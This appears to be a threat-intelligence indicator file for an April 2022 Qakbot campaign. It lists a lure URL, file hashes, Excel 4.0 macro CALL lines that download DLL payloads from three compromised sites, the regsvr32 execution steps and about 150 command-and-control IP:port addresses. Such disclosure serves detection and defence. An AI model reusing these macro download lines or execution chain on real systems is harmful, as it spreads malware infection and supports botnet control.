Qakbot_AA_18.04.2022.txt
14.04.2022 | Qakbot | AA | Version 403.573 | Campaign | 1650264998
******************************
.url https://danlle.com/ou/oinsenu
.zip 5fe43d7ccdd3f9e8c3f1149e690d56a9eb14d903546e8c5807b4afa7abfc8322
.xls 38f5a4e3d235e9045f23c1acf92fae6faae4ba9da1418cafc26e3f91e170772f
.dll b44ff94810d92c518d61ed33f4cf4161968802a0c4f599c6eb938d76b77df5fb
******************************
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\Rfgsg", 0)
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://kenpong.com/07jMiafn/Asnhfn.png", "C:\Rfgsg\Ojijan.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://taiyokagakuindia.com/uRl2nqDPMH/Asnhfn.png", "C:\Rfgsg\Ojijana.ooccxx")
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "https://shivalayatours.com/DAZYS42a/Asnhfn.png", "C:\Rfgsg\Ojijanb.ooccxx")
https://kenpong.com/07jMiafn/Asnhfn.png
https://taiyokagakuindia.com/uRl2nqDPMH/Asnhfn.png
https://shivalayatours.com/DAZYS42a/Asnhfn.png
*************************************************
Exec >>
EXCEL.EXE C:\Users\Admin\AppData\Local\Temp\K-1605943503.xlsb
Regsvr32 /s calc
Regsvr32 C:\Rfgsg\Ojijan.ooccxx
Regsvr32 C:\Rfgsg\Ojijana.ooccxx
Regsvr32 C:\Rfgsg\Ojijanb.ooccxx
*************************************************
https://tria.ge/220418-wh1m4ahdfp
*************************************************
C2s (IP:port)
143.0.219.6:995
103.139.243.207:990
39.52.59.184:995
72.27.15.168:443
45.241.140.246:993
24.152.219.253:995
75.99.168.194:443
190.73.3.148:2222
24.43.99.75:443
74.15.2.252:2222
39.41.247.72:995
38.70.253.226:2222
108.60.213.141:443
47.23.89.62:993
176.67.56.94:443
2.50.4.57:443
101.109.214.129:443
148.64.96.100:443
140.82.49.12:443
76.25.142.196:443
85.101.204.178:443
39.44.144.159:995
1.161.67.235:443
85.104.122.231:443
47.23.89.62:995
111.125.245.118:995
5.54.50.169:995
217.164.76.203:2078
83.110.91.58:443
115.50.79.104:2222
39.49.56.93:995
86.97.11.43:443
46.107.48.202:443
179.174.52.27:32101
1.161.67.235:995
116.30.5.32:995
75.99.168.194:61201
176.205.23.170:1194
32.221.224.140:995
31.35.28.29:443
78.100.192.210:6883
187.207.47.198:61202
71.13.93.154:2222
117.248.109.38:21
173.174.216.62:443
45.9.20.200:443
149.28.238.199:443
149.28.238.199:995
144.202.2.175:443
45.76.167.26:995
140.82.63.183:995
144.202.3.39:443
140.82.63.183:443
45.76.167.26:443
144.202.3.39:995
45.63.1.12:995
144.202.2.175:995
45.63.1.12:443
70.46.220.114:443
103.88.226.30:443
86.98.156.198:993
180.183.97.165:2222
84.241.8.23:32103
103.87.95.133:2222
121.7.223.59:2222
37.186.54.254:995
182.191.92.203:995
24.178.196.158:2222
217.128.122.65:2222
78.100.234.143:2222
86.98.208.214:2222
172.114.160.81:995
175.145.235.37:443
202.134.152.2:2222
91.177.173.10:995
45.46.53.140:2222
120.150.218.241:995
203.122.46.130:443
85.246.82.244:443
173.21.10.71:2222
174.69.215.101:443
189.146.73.62:443
208.107.221.224:443
73.151.236.31:443
67.165.206.193:993
109.12.111.14:443
5.32.41.45:443
37.34.253.233:443
176.205.23.170:2222
41.129.82.125:995
41.84.229.11:995
191.99.191.28:443
41.38.167.179:995
103.107.113.120:443
43.252.72.97:2222
41.107.132.178:443
196.203.37.215:80
177.158.7.155:443
72.12.115.71:22
190.252.242.69:443
90.120.65.153:2078
179.158.105.44:443
109.228.220.196:443
180.129.102.214:995
102.182.232.3:995
184.100.157.205:443
72.76.94.99:443
72.66.116.235:995
47.158.25.67:443
47.180.172.159:443
77.104.81.12:443
93.48.80.198:995
80.11.74.81:2222
86.195.158.178:2222
81.215.196.174:443
92.132.172.197:2222
5.95.58.211:2087
159.146.13.189:995
41.228.22.180:443
94.140.8.13:2222
76.70.9.169:2222
114.79.148.170:443
187.250.114.15:443
201.145.179.247:443
187.172.232.250:443
47.156.191.217:443
47.180.172.159:50010
72.252.201.34:990
100.1.108.246:443
191.17.223.222:32101
70.51.152.186:2222
101.50.120.166:995
66.98.42.102:443
72.252.201.34:995
40.134.246.185:995
191.112.20.100:443
96.21.251.127:2222
82.152.39.39:443
31.48.166.122:2078
105.226.83.196:995
191.32.206.233:443
197.89.21.131:443
24.139.72.117:443
45.241.140.203:995
76.69.155.202:2222
121.74.167.191:995
187.251.132.144:22
187.102.135.142:2222
24.55.67.176:443
181.208.248.227:443